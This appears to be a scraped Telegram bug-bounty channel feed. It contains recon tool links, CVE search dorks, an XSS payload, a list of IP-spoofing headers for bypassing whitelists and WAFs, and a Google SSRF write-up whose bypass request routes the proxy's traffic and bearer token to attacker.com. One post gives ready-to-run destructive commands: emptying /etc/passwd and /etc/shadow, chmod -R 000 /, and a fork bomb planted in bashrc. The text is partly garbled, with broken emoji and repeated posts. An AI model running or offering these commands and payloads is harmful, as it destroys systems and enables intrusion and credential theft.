β‘WaybackLister is a reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings. It's fast, multithreaded, and built for practical use in security assessments and bug bounty recon.
β https://github.com/anmolksachan/wayBackLister
β Join Telegram For More Content: t.iss.one/brutsecurity
----------------------------------------------------------
π Ready to Skill Up? Enroll Now β wa.link/brutsecurity
#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
β https://github.com/anmolksachan/wayBackLister
β Join Telegram For More Content: t.iss.one/brutsecurity
----------------------------------------------------------
π Ready to Skill Up? Enroll Now β wa.link/brutsecurity
#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
β€9π7π₯5
CVE-2025-27007: Privilege Escalation in OttoKit WordPress Plugin, 9.8 rating π₯
Errors in the logic of the plugin's API could potentially lead to an attacker gaining access to the administrator account. According to Patchstack, exploitation of the vulnerability began just an hour after public disclosure!
Search at Netlas.io:
π Link: https://nt.ls/y4FXX
π Dork: http.body:"plugins/suretriggers"
Read more: https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
Errors in the logic of the plugin's API could potentially lead to an attacker gaining access to the administrator account. According to Patchstack, exploitation of the vulnerability began just an hour after public disclosure!
Search at Netlas.io:
π Link: https://nt.ls/y4FXX
π Dork: http.body:"plugins/suretriggers"
Read more: https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
π14
Good morning hackers π₯±
Need more Google bug POC's? π
γ €
Need more Google bug POC's? π
γ €
π33π₯8π2π€2
π₯Sensitive informations leaks vai fofa Dorking π₯
Hey Hunter's, DarkShadow back again dropping a simple and effective dork.
Fofa query:
If you guy's really enjoy to read my methodology's don't forget to follow me ππΌ DarkShadow
#dork #bugbountytips
Hey Hunter's, DarkShadow back again dropping a simple and effective dork.
Leaking firebase configurationsπFofa query:
body="firebaseapp" && domain="example.com"
Or
(body="firebaseapp" || body="firebaseconfig") && host=".target_domain_name_only"
If you guy's really enjoy to read my methodology's don't forget to follow me ππΌ DarkShadow
#dork #bugbountytips
πΏ8π6β€4
Brut Security
π₯Sensitive informations leaks vai fofa Dorking π₯ Hey Hunter's, DarkShadow back again dropping a simple and effective dork. Leaking firebase configurationsπ Fofa query: body="firebaseapp" && domain="example.com" Or (body="firebaseapp" || body="firebaseconfig")β¦
Guy's read this hackerone report to know how to exploit further using this sensitive informations.
https://hackerone.com/reports/1447751
https://hackerone.com/reports/1447751
π10
Hey Hunter's,
Dark Shadow here back again. Dropping a Google XSS POC-2π
β POC steps:
A simple payload can flip the game if you are use it in right place.π
The vulnerability has been patchedπ₯±
Let me knowβarenβt you all interested to know that Google rewarded $31,337 for an SSRF vulnerability?
And
Don't forget to follow me ππΌ DarkShadow
#xss #googlebug
Dark Shadow here back again. Dropping a Google XSS POC-2π
β POC steps:
β’Vuln host: books.google.com
β’Xss type: stored based XSS
β’Vuln param: book name title and publisher name parameter.
β’Technique: direct inject the payload. Without any kind of encoding. (Reason: no input sanitization)
Payload: "><svg/onload=prompt(1)>
A simple payload can flip the game if you are use it in right place.π
The vulnerability has been patchedπ₯±
Let me knowβarenβt you all interested to know that Google rewarded $31,337 for an SSRF vulnerability?
And
Don't forget to follow me ππΌ DarkShadow
#xss #googlebug
π₯23πΏ8π4β€2π³2
CVE-2025-20188: Use of Hard-coded Credentials in Cisco IOS XE, 10.0 rating π₯π₯π₯
Due to hard-coded JWT, Cisco IOS XE instances may be vulnerable to arbitrary file uploads, path traversal, and arbitrary command execution. Catalyst controllers are primarily affected.
Search at Netlas.io:
π Link: https://nt.ls/BKkJI
π Dork: certificate.issuer_dn:"IOS-Self-Signed-Certificate"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC
Due to hard-coded JWT, Cisco IOS XE instances may be vulnerable to arbitrary file uploads, path traversal, and arbitrary command execution. Catalyst controllers are primarily affected.
Search at Netlas.io:
π Link: https://nt.ls/BKkJI
π Dork: certificate.issuer_dn:"IOS-Self-Signed-Certificate"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-wlc-file-uplpd-rHZG9UfC
π₯6π2π±1
Hey Hunter's,
If you're facing difficulties setting up Kali NetHunter, then Proot-Distro is a powerful and user-friendly alternative. It offers an easy and comprehensive solution for running multiple Linux distributions directly in Termuxβno root required.
Explore it on GitHub:
https://github.com/termux/proot-distro
If you're facing difficulties setting up Kali NetHunter, then Proot-Distro is a powerful and user-friendly alternative. It offers an easy and comprehensive solution for running multiple Linux distributions directly in Termuxβno root required.
Explore it on GitHub:
https://github.com/termux/proot-distro
π¨βπ»5β€4πΏ1
Hey Hunter's
DarkShadow here β back again with some killer techniques most bug bounty hunters overlook.
IP Spoofing Headers for Bypass & Testing:
Use: Bypass IP whitelisting, rate limits, geo-blocks, SSRF filters, or trigger internal behavior. Combine multiple for better results in black-box testing.
Don't forget to follow me ππΌ DarkShadow
#bugbountytips #wafbypass
DarkShadow here β back again with some killer techniques most bug bounty hunters overlook.
IP Spoofing Headers for Bypass & Testing:
X-Forwarded-For: 127.0.0.1
# Trusted by proxies/load balancers
X-Real-IP: 127.0.0.1
# Common in NGINX setups
X-Client-IP: 127.0.0.1
# Used for rate limiting/tracking
X-Remote-IP: 127.0.0.1
# May influence backend logic
X-Remote-Addr: 127.0.0.1
# Tries to override remote IP
True-Client-IP: 127.0.0.1
# Used by CDNs (e.g. Akamai)
CF-Connecting-IP: 127.0.0.1
# Cloudflare real IP header
Fastly-Client-IP: 127.0.0.1
# Fastly CDN client IP
X-Cluster-Client-IP: 127.0.0.1
# Seen in clustered environments
Forwarded: for=127.0.0.1
# RFC standard version of XFF
X-Originating-IP: 127.0.0.1
# Used by mail servers & legacy apps
X-Forwarded-Host: 127.0.0.1
# Can affect virtual host routing
X-Forwarded-Server: 127.0.0.1
# Backend routing logic
X-Real-Hostname: localhost
# Tries to spoof internal host
Via: 127.0.0.1
# May appear in proxy chains
Forwarded-For: 127.0.0.1
# Non-standard but seen in wild
Proxy-Client-IP: 127.0.0.1
# Java-based servers (Tomcat)
WL-Proxy-Client-IP: 127.0.0.1
# WebLogic-specific header
ο»Ώ
Use: Bypass IP whitelisting, rate limits, geo-blocks, SSRF filters, or trigger internal behavior. Combine multiple for better results in black-box testing.
Don't forget to follow me ππΌ DarkShadow
#bugbountytips #wafbypass
π₯23β€7π4πΏ3π€2
This is not for hacking, this is for hackers;
If you're still not found anything in your bug hunting, then first apply this code in your file:
Never give up, just you have need to change your mind set-up.
Remember, where everyone give up pro's started thereπ
If you're still not found anything in your bug hunting, then first apply this code in your file:
while(!success){
tryagain();
if(tried)
break;
}
Never give up, just you have need to change your mind set-up.
Remember, where everyone give up pro's started thereπ
π€23β€13π5
β οΈDon't try these DarkShadow's commands:
Just dropping DarkShadow's bash nuclear some of demo commandsπ¨
1οΈβ£ππΌOverwrite /etc/passwd and /etc/shadow
Destroys all user accounts, including root.
Result: Nobody can login anymore β system is fcked.
2οΈβ£ππΌMake the system unusable (chmod all permissions)
Remove all permissions (read/write/execute) from all files and folders.
Result: You can't even ls or login properly. Full chaos.
3οΈβ£ππΌPersistent Fork Bomb (auto start even after reboot)
Adds the fork bomb into startup files (.bashrc or /etc/bash.bashrc).
Result: As soon as anyone logs in, the machine crashes.
Hard to recover unless you boot into recovery mode and manually edit.
Just dropping DarkShadow's bash nuclear some of demo commandsπ¨
1οΈβ£ππΌOverwrite /etc/passwd and /etc/shadow
echo "" > /etc/passwd
echo "" > /etc/shadow
Destroys all user accounts, including root.
Result: Nobody can login anymore β system is fcked.
2οΈβ£ππΌMake the system unusable (chmod all permissions)
chmod -R 000 /
Remove all permissions (read/write/execute) from all files and folders.
Result: You can't even ls or login properly. Full chaos.
3οΈβ£ππΌPersistent Fork Bomb (auto start even after reboot)
echo ':(){ :|:& };:' >> ~/.bashrc
or for all users:
echo ':(){ :|:& };:' >> /etc/bash.bashrc
Adds the fork bomb into startup files (.bashrc or /etc/bash.bashrc).
Result: As soon as anyone logs in, the machine crashes.
Hard to recover unless you boot into recovery mode and manually edit.
π±12π9π«‘7β€6
ShodanXβ‘οΈβ A terminal-powered recon and OSINT tool built on top of the Shodan Services to gather information of targets using shodan dorks β¨
β Link - https://github.com/RevoltSecurities/Shodanx
π @mrz_0047
#BugBounty #cybersecurity #infosec #shodan
β Link - https://github.com/RevoltSecurities/Shodanx
#BugBounty #cybersecurity #infosec #shodan
Please open Telegram to view this post
VIEW IN TELEGRAM
1β€18π2
Hey Hunters,
DarkShadow hereβback again with a very interesting Google SSRF Proof of Concept!
π§ Fixing the Unfixable: A Google Cloud SSRF Tale
A critical Server-Side Request Forgery (SSRF) vulnerability was discovered in Google's cxl-services.appspot.com proxy, which powers interactive demos for various Google Cloud products, including jobs.googleapis.com.
π Discovery
While exploring the Cloud Talent Solution API (jobs.googleapis.com), it was noticed that demo requests were routed through:
cxl-services.appspot.com/proxy?url=
Hereβs a sample request:
The response returned 200 OK and displayed the full content, meaning the SSRF was not blind β and that makes it critical.
𧱠Initial Test: Traditional SSRF Blocked
Trying to change the url parameter to a malicious domain:
Response:
403 Forbidden
Invalid Target Host - Please add to allow list
This indicated the presence of a backend whitelist restricting outbound requests.
π‘οΈ Whitelist Bypass Trick
Despite the whitelist, a clever bypass was possible by exploiting discrepancies between URL parsers (RFC3986 vs. WHATWG) using a backslash (\) and @ symbol:
This tricked the proxy into making the request to attacker.com, while treating the domain as jobs.googleapis.com.
π Sensitive Token Leakage
Even worse: the proxy included an Authorization: Bearer <token> header in its outbound requests.
By redirecting traffic to a controlled server, the researcher was able to capture tokens granting access to internal Google Cloud projects such as:
He even deployed a custom App Engine service within cxl-services, proving full code execution capabilities.
π° Bounty Rewards
For these critical findings, the researcher earned over $13,000 from Googleβs Vulnerability Reward Program (VRP).
Credit: Discovered by David SchΓΌtz
But Hunters, donβt forget to follow me for more deep-dive writeups and live exploitation breakdowns!
Follow me in X ππΌ DarkShadow
#bugbountytips #googlebug #ssrf
DarkShadow hereβback again with a very interesting Google SSRF Proof of Concept!
π§ Fixing the Unfixable: A Google Cloud SSRF Tale
A critical Server-Side Request Forgery (SSRF) vulnerability was discovered in Google's cxl-services.appspot.com proxy, which powers interactive demos for various Google Cloud products, including jobs.googleapis.com.
π Discovery
While exploring the Cloud Talent Solution API (jobs.googleapis.com), it was noticed that demo requests were routed through:
cxl-services.appspot.com/proxy?url=
Hereβs a sample request:
GET /proxy?url=https://jobs.googleapis.com/v4/projects/4808913407/tenants/ff8c4578-8000-0000-0000-00011ea231ff/jobs:search HTTP/1.1
Host: cxl-services.appspot.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0
Content-Type: application/json; charset=utf-8
Content-Length: 102
Connection: close
{"jobQuery":{"query":"bartendar","queryLanguageCode":"en"},"jobView":"JOB_VIEW_SMALL","maxPageSize":5}
The response returned 200 OK and displayed the full content, meaning the SSRF was not blind β and that makes it critical.
𧱠Initial Test: Traditional SSRF Blocked
Trying to change the url parameter to a malicious domain:
GET /proxy?url=https://attacker_server.com HTTP/1.1
Host: cxl-services.appspot.com
Response:
403 Forbidden
Invalid Target Host - Please add to allow list
This indicated the presence of a backend whitelist restricting outbound requests.
π‘οΈ Whitelist Bypass Trick
Despite the whitelist, a clever bypass was possible by exploiting discrepancies between URL parsers (RFC3986 vs. WHATWG) using a backslash (\) and @ symbol:
GET /proxy?url=https://attacker.com\@jobs.googleapis.com/ HTTP/1.1
Host: cxl-services.appspot.com
This tricked the proxy into making the request to attacker.com, while treating the domain as jobs.googleapis.com.
π Sensitive Token Leakage
Even worse: the proxy included an Authorization: Bearer <token> header in its outbound requests.
By redirecting traffic to a controlled server, the researcher was able to capture tokens granting access to internal Google Cloud projects such as:
docai-demo
cxl-services
garage-staging
p-jobs
He even deployed a custom App Engine service within cxl-services, proving full code execution capabilities.
π° Bounty Rewards
For these critical findings, the researcher earned over $13,000 from Googleβs Vulnerability Reward Program (VRP).
Credit: Discovered by David SchΓΌtz
But Hunters, donβt forget to follow me for more deep-dive writeups and live exploitation breakdowns!
Follow me in X ππΌ DarkShadow
#bugbountytips #googlebug #ssrf
π₯15π8πΏ2β€1π±1